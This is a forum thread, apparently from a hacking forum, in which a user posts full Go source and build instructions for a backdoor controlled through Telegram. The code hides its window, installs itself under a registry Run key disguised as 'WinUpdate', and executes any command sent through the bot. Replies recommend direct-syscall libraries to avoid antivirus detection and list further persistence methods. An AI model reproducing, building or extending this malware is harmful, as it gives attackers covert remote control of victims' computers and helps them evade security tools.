golang backdoor source code !!

[stars4]

Hello, here I leave you, an example of code from my backdoor written in golang, controlled by telegram, you need to have golang installed, preferably a recent version, then save this code as main.go for example, then install the dependencies using the following commands

go mod init main.go
go mod tidy

then to generate an executable from linux for windows use
GOOS=windows GOARCH=386 go build -ldflags "-s -w -H windowsgui" -o backdoor.exe main.go

and in windows use
go build -ldflags "-s -w -H windowsgui" -o backdoor.exe main.go

The code is also compatible with Linux

package main

import (
     "os"
     "log"
     "time"
     "sync"
     "runtime"
     "strconv"
     "os/exec"
     "syscall"
     "strings"
     tele "gopkg.in/telebot.v3"
)

var  (
     thread = sync.WaitGroup{}
     TOKEN  = "YOUR_TELEGRAM_BOT_API_TOKEN"
)

func SetPersistence() {
     defer thread.Done()
     mype,_ := os.Executable()
     per := exec.Command("cmd.exe", "/c", "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \" /v WinUpdate /t REG_SZ /d \"" + mype + "\" /f")
     per.CombinedOutput()
}

func ExecCmd(Cmd string, botSender tele.Context) string {
     defer thread.Done()
     cmd := exec.Command("cmd.exe", "/c", Cmd)
     cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
     output, err := cmd.CombinedOutput()
     if err != nil {
        botSender.Send(err.Error())
        return ""
     }
     botSender.Send(string(output))
     return ""
}

func GetHelp() string {
     help := "/help   show this\n"
     help += "/exec   execute any command\n"
     help += "/cd     change working dir\n"
     help += "/pwd    get current worling dir\n"
     help += "/info   get basic info\n"
     help += "/pid    get this process pid\n"
     help += "/start  start bot message\n"
     return help
}

func Pwd() string {
     pwd,_ := os.Getwd()
     return pwd
}

func GetPid() string {
     return "process pid: " +  strconv.Itoa(os.Getpid())
}

func ChangeDir(Target string) string {
     if err := os.Chdir(Target); err != nil {
        if os.Chdir(strings.ReplaceAll(Target, " ", "")) != nil {
           return "error to change dir to " + Target
        } else {
           return Pwd()
        }
        return "error to change dir to " + Target
     }
     return Pwd()
}

func GetInfo() string {
     pwdc,_  := os.Getwd()
     execf,_ := os.Executable()
     core    := strconv.Itoa(runtime.NumCPU())
     plat    := runtime.GOOS + "/" + runtime.GOARCH
     info    := "\nbasic info\n"
     info    += "\npwd      : " + pwdc
     info    += "\npefile   : " + execf
     info    += "\ncores    : " + core
     info    += "\nplatform : " + plat
     return  info
}

func Setup() {
     conf := tele.Settings{Token:  TOKEN,Poller: &tele.LongPoller{Timeout: 10 * time.Second},}

     bot, botErr := tele.NewBot(conf)

     if botErr != nil {
    log.Println(botErr.Error())
    return
     }

     bot.Handle("/start", func(sender tele.Context) error {
           return sender.Send("enjoy this access.. !")
     })

     bot.Handle("/exec", func(sender tele.Context) error {
           thread.Add(1)
           go ExecCmd(sender.Message().Payload, sender)
           return nil
     })

     bot.Handle("/pwd", func(sender tele.Context) error {
           return sender.Send(Pwd())
     })

     bot.Handle("/info", func(sender tele.Context) error {
           return sender.Send(GetInfo())
     })

     bot.Handle("/cd", func(sender tele.Context) error {
           return sender.Send(ChangeDir(sender.Message().Payload))
     })

     bot.Handle("/pid", func(sender tele.Context) error {
           return sender.Send(GetPid())
     })

     bot.Handle("/help", func(sender tele.Context) error {
           return sender.Send(GetHelp())
     })

     bot.Start()
}

func Loop() {
     defer thread.Done()
     thread.Add(1)
     go SetPersistence()
  
     for {
          Setup()
          time.Sleep(time.Second * 2)
     }
}

func main() {
     thread.Add(1)
     go Loop()
     thread.Wait()
}

 

[stars4]

replace YOUR_TELEGRAM_BOT_API_TOKEN with your telegram bot api token
backdoor commads:

/exec command
/info --> get basic info
/cd dirname --> change working dir
/pwd --> get current working dir
/pid --> get backdoor process pid
/help --> get help

 

[Super Crypt]

Good job! Improve it with https://github.com/C-Sto/BananaPhone/tree/master
and publish!

 

[stars4]

Good job! Improve it with https://github.com/C-Sto/BananaPhone/tree/master
and publish!

is for syscalls ?

 

[Super Crypt]

is for syscalls ?

yes that's it

 

[Super Crypt]

is for syscalls ?

this will help you to avoid runtime detections

 

[Super Crypt]

is for syscalls ?

also good idea implement startup feauture in differect ways. use logonscript, run reg key and Startup folder combo

 

[stars4]

also good idea implement startup feauture in differect ways. use logonscript, run reg key and Startup folder combo

or schtaks, or reg file

 

[stars4]

also good idea implement startup feauture in differect ways. use logonscript, run reg key and Startup folder combo

Maybe it will be implemented in a while that I am programming, also in Golang

 

[stars4]

Maybe it will be implemented in a while that I am programming, also in Golang

Any recommended features to add like executing commands and stuff?

 

[pentesterMaster]

You have inspired me to Learn GO

 

[stars4]

You have inspired me to Learn GO

thanks any questions ask